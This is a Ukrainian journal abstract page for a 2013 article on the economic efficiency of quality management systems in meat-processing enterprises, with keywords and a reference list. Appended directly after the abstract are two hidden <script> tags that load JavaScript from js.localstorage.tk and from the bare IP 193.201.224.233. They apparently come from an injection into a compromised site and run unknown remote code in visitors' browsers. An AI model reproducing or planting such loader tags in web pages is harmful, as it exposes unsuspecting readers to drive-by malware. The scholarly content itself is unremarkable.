ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 005:006.015.5
Аграрний менеджмент і підприємництво

Економічна ефективність запровадження систем управління якістю в підприємстві / Шелест Н. А. // Економіка АПК. - 2013. - № 2 - С. 71

Проаналізовано стан і проблеми запровадження систем управління якістю в м’ясопереробних під­приємствах України. Обґрунтовано методику оцінки ефективності запровадження систем управління якістю та їх вплив на підвищення економічної ефективності підприємств. Табл.: 1. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: управління якістю, м’ясопереробне підприємство, системи управління якістю, економічна ефективність підприємства

Список використаних джерел

 1. Бабаев В.Ю. Управління якістю на підприємствах / В.Ю. Бабаев, Н.І. Маєвська // Бізнес Інформ. - 2011. - № 8. - С. 175-178.
 2. Бредіхін Л. Чому українську продукцію в ЄС не вважають безпечною / Л. Бредіхін, М. Самаріна // Пропозиція. - 2011. - № 7. - С. 126-127.
 3. БрунМ. Управление качеством: затраты и выгоды / М. Брун, Д. Георги // Проблемы теории и практики управления. - 2000. - № 1. - С. 70-75.
 4. Віткін Л. Світовий досвід упровадження та сертифікації систем управління / Л. Віткін // Стандартизація, сертифікація, якість — 2010. № 2. - С. 43^9.
 5. Деминг Э. Выход из кризиса: новая парадигма управления людьми, системами и процессами / Э. Деминг. - М.: Альпина Бизнес Букс. 2009. - 370 с.
 6. ДрузюкВ. Система управління якістю - інвестиція в майбутнє / В. Друзюк, О. Федак// Стандартизація, сертифікація, якість. - 2009. - №1. - С.51 - 54.
 7. ДСТУ ISO 9004:2009. Системи управління якістю. Настанови щодо поліпшення діяльності (ISO 9004:2009, IDT). - К.:ДЕРЖСПОЖИВСТАНДАРТ УКРАЇНИ, 2010. - 62 с.
 8. Показники моніторингу впровадження та сертифікації систем управління за даними Реєстру Системи сертифікації УкрСЕПРО за II квартал 2012 р.// Матеріал сайту Державного підприємства „Український науково-дослідний і навчальний центр проблем стандартизації, сертифікації та якості” [Електронний ресурс] / Режим доступу до сайту:http://www.ukrndnc.org.ua/index.php
 9. Сертификация по ИСО 9001: „За” и „Против”. Аналітична записка. - Матеріал із сайту ІНТЕРСЕРТИФІКА-ТЮФ разом з ТЮФ Тюрінге. [Електронний ресурс]. - Режим доступу до сайту: htth:// www.qcert.ru/rus/docs/certification--management-systems/certification-9001/.
 10. Україні потрібна Державна програма управління якістю продукції - Матеріали з Прес-центру Мінекономрозвитку [Електронний ре¬сурс]. - Режим доступу до сайту: htth://ppa.gov.ua./press_center/economic_news/35828/.
 11. ФейгенбаумА. Контроль качества продукции: сокр. пер. с англ. / А. Фейгенбаум. - М.: Экономика, 1986. - 471 с.
 12. Щорічний огляд Міжнародної організації по сертифікації ISO „The ISO Survey of ertifications - 2010” про стан справ у світі з сертифікації на відповідність найбільш популярним стандартам на системи менеджменту - ISO 9001,ISO 14001, ISO /TS 16949, ISO 13484, ISO / IEC 27001, ISO 22000. [Електронний ресурс] / Режим доступу до cafiTy:http://www.iso.org/iso/iso-survey 2010 pdf
Читати статтю: 13_02_12.pdf